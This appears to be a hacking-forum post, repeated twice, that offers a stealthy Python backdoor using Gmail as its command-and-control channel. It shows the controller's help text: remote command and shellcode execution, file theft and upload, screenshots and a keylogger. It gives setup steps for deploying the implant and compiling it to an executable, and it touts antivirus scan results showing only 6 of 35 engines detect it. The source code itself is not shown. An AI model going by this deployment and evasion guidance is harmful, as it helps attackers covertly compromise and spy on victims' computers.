13 Years of Service
70%
A stealthy Python based backdoor that uses Gmail as a command and control server
Options:
Options:
Code:
>
dP
88
.d8888b. .d8888b. .d8888b. d8888P
88' `88 88' `"" 88' `88 88
88. .88 88. ... 88. .88 88
`8888P88 `88888P' `88888P8 dP
.88
d8888P
.__....._ _.....__,
.": o :': ;': o :".
`. `-' .'. .'. `-' .'
`---' `---'
_...----... ... ... ...----..._
.-'__..-''---- `. `"` .' ----'''-..__`-.
'.-' _.--''' `-._.-' ''''--._ `-.`
' .-"' : `"-. `
' `. _.'"'._ .' `
`. ,.-'" "'-., .'
`. .'
jgs `-._ _.-'
`"'--...___...--'"`
...IM IN YUR COMPUTERZ...
WATCHIN YUR SCREENZ
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve
-list List available clients
-info Retrieve info on specified client
Commands:
Commands to execute on an implant
-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-upload SRC DST Upload a file to the clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
Meow!
Setup
For this to work you need:
A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account
You may also have to enable IMAP in the account settings
This repo contains two files:
gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller
Filename: implant.py
Detection Rate: 6/35
File Size: 23kb
File MD5: 3e527b7c656ecdfcfc247ee420a3a967
File SHA1: 1d2d273d312bae585ba56badf7cda75953b13ecc
Date: 16-Aug-2016 14:35:12 GMT
Link:
AVG Free : Clean
Avast : Python:InfoStealer-A [Trj]
AntiVir (Avira) : Clean
BitDefender : Clean
Clam Antivirus : Clean
COMODO Internet Security : Clean
Dr.Web : Python.BackDoor.14
eTrust-Vet : Clean
F-PROT Antivirus : Clean
F-Secure Internet Security : Clean
G Data : Clean
IKARUS Security : Trojan.Python.Agent
Kaspersky Antivirus : Clean
McAfee : Clean
MS Security Essentials : Backdoor
ython/Atalag.A
ESET NOD32 : Backdoor.Python/Agent.K
Norman : Clean
Norton Antivirus : Backdoor.Trojan
Panda Security : Clean
A-Squared : Clean
Quick Heal Antivirus : Clean
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
VBA32 Antivirus : Clean
Zoner AntiVirus : Clean
Ad-Aware : Clean
BullGuard : Clean
FortiClient : Clean
K7 Ultimate : Clean
NANO Antivirus : Clean
Panda CMD : Clean
VIPRE : Clean
SUPERAntiSpyware : Clean
Twister Antivirus : Clean
Download
[HIDE-THANKS]
[/HIDE-THANKS]
For this to work you need:
A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account
You may also have to enable IMAP in the account settings
This repo contains two files:
gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller
Filename: implant.py
Detection Rate: 6/35
File Size: 23kb
File MD5: 3e527b7c656ecdfcfc247ee420a3a967
File SHA1: 1d2d273d312bae585ba56badf7cda75953b13ecc
Date: 16-Aug-2016 14:35:12 GMT
Link:
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
AVG Free : Clean
Avast : Python:InfoStealer-A [Trj]
AntiVir (Avira) : Clean
BitDefender : Clean
Clam Antivirus : Clean
COMODO Internet Security : Clean
Dr.Web : Python.BackDoor.14
eTrust-Vet : Clean
F-PROT Antivirus : Clean
F-Secure Internet Security : Clean
G Data : Clean
IKARUS Security : Trojan.Python.Agent
Kaspersky Antivirus : Clean
McAfee : Clean
MS Security Essentials : Backdoor

ESET NOD32 : Backdoor.Python/Agent.K
Norman : Clean
Norton Antivirus : Backdoor.Trojan
Panda Security : Clean
A-Squared : Clean
Quick Heal Antivirus : Clean
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
VBA32 Antivirus : Clean
Zoner AntiVirus : Clean
Ad-Aware : Clean
BullGuard : Clean
FortiClient : Clean
K7 Ultimate : Clean
NANO Antivirus : Clean
Panda CMD : Clean
VIPRE : Clean
SUPERAntiSpyware : Clean
Twister Antivirus : Clean
Download
[HIDE-THANKS]
This link is hidden for visitors. Please Log in or register now.